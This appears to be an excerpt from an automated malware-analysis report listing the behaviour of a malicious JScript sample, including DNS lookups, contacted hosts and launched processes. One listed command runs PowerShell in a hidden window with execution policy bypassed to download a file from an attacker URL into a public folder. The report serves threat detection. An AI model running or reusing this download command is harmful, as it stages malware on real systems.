Technical Information
- https://app.nihaoconsult.com/seafhttp/files/6a16cd76-b91d-4710-97b2-b37b7573da9e/m3.txt as c:\users\public\libraries\m3.txt
- 'ap#.###aoconsult.com':443
- 'x.##2.us':80
- 'microsoft.com':80
- http://x.##2.us/x.cer
- http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
- DNS ASK ap#.###aoconsult.com
- DNS ASK x.##2.us
- DNS ASK microsoft.com
- '%WINDIR%\syswow64\cscript.exe' /e:jscript "<PATH_SAMPLE>.js"' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass (New-Object System.Net.WebClient).DownloadFile('https://app.nihaoconsult.com/seafhttp/files/6a16cd76-b91d-4710-97b2-b37b7573da9e/m3.txt', 'C:\Users\Public\Librarie...' (with hidden window)
- '%WINDIR%\syswow64\cscript.exe' /e:jscript "<PATH_SAMPLE>.js"